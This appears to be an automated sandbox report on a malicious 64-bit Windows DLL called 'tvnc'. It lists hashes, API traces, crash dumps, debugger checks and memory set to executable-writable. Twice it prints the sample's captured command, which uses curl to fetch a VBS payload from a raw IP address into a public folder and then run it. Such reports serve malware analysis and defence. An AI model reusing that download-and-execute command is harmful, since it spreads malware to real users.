Summary | ZeroBOX

tvnc

PE64 PE File DLL
Category Machine Started Completed
FILE s1_win7_x6401 Oct. 4, 2023, 10:17 a.m. Oct. 4, 2023, 10:19 a.m.
Size 50.0KB
Type PE32+ executable (DLL) (GUI) x86-64 (stripped to external PDB), for MS Windows
MD5 279e80bab42a9971336f59d05e281f96
SHA256 eef2098383e9942b9ca54fc45163bb8b2404b1d176020ebe0ee724d66be1a68c
CRC32 25235E17
ssdeep 1536:F7pxSJsy6Nh5wFHssKjrtN/5jqzyCNwGXGhric45gwN:/YwNh5wFHssKXnxjNCNHGFwN
Yara
  • PE_Header_Zero - PE File Signature
  • IsDLL - (no description)
  • IsPE64 - (no description)

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
No hosts contacted.

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Time & API Arguments Status Return Repeated

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0

IsDebuggerPresent

0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

buffer: 'C:\Windows\system32\curl.exe' is not recognized as an internal or external command, operable program or batch file.
console_handle: 0x000000000000000b
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

1 1 0
Time & API Arguments Status Return Repeated

__exception__

stacktrace:
xlAutoOpen+0x99 hash-0x9af7 tvnc+0x1509 @ 0x7fef4961509
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373
0x223e747069726373

exception.instruction_r: c3 90 90 90 90 90 90 48 83 ec 28 48 8b 05 f5 9a
exception.instruction: ret
exception.exception_code: 0xc0000005
exception.symbol: xlAutoOpen+0x99 hash-0x9af7 tvnc+0x1509
exception.address: 0x7fef4961509
registers.r14: 0
registers.r15: 0
registers.rcx: 48
registers.rsi: 0
registers.r10: 0
registers.rbx: 131454
registers.rsp: 1636720
registers.r11: 514
registers.r8: 1634888
registers.r9: 1634944
registers.rdx: 8796092887632
registers.r12: 3403660466342687599
registers.rbp: 2080832
registers.rdi: -1
registers.rax: 0
registers.r13: 0
1 0 0

__exception__

stacktrace:
xlAutoOpen+0x9b90 tvnc+0xb000 @ 0x7fef496b000
rundll32+0x2f42 @ 0xff3c2f42
rundll32+0x3b7a @ 0xff3c3b7a
BaseThreadInitThunk+0xd CreateThread-0x53 kernel32+0x1652d @ 0x76c2652d
RtlUserThreadStart+0x21 strchr-0x3df ntdll+0x2c521 @ 0x76d5c521

exception.instruction_r: 78 c2 96 f4 fe 07 00 00 00 00 00 00 00 00 00 00
exception.instruction: js 0x7fef496afc4
exception.exception_code: 0xc0000005
exception.symbol: xlAutoOpen+0x9b90 tvnc+0xb000
exception.address: 0x7fef496b000
registers.r14: 0
registers.r15: 0
registers.rcx: 459052
registers.rsi: 0
registers.r10: 0
registers.rbx: 0
registers.rsp: 1769344
registers.r11: 1768432
registers.r8: 3195008
registers.r9: 10
registers.rdx: 4282122240
registers.r12: 0
registers.rbp: 0
registers.rdi: 0
registers.rax: 459052
registers.r13: 0
1 0 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2924
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007304c000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2888
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007304c000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 2972
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007304c000
process_handle: 0xffffffffffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 3024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x000000007304c000
process_handle: 0xffffffffffffffff
1 0 0
cmdline "C:\Windows\System32\cmd.exe" /c C:\Windows\system32\curl.exe -o c:\users\public\123321.vbs http://207.246.78.68/6kQh/AQbK2&&timeout 10&&c:\users\public\123321.vbs
Time & API Arguments Status Return Repeated

ShellExecuteExW

show_type: 0
filepath_r: cmd
parameters: /c C:\Windows\system32\curl.exe -o c:\users\public\123321.vbs http://207.246.78.68/6kQh/AQbK2&&timeout 10&&c:\users\public\123321.vbs
filepath: cmd
1 1 0
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 3024
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 4096
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x000007fffff90000
process_handle: 0xffffffffffffffff
1 0 0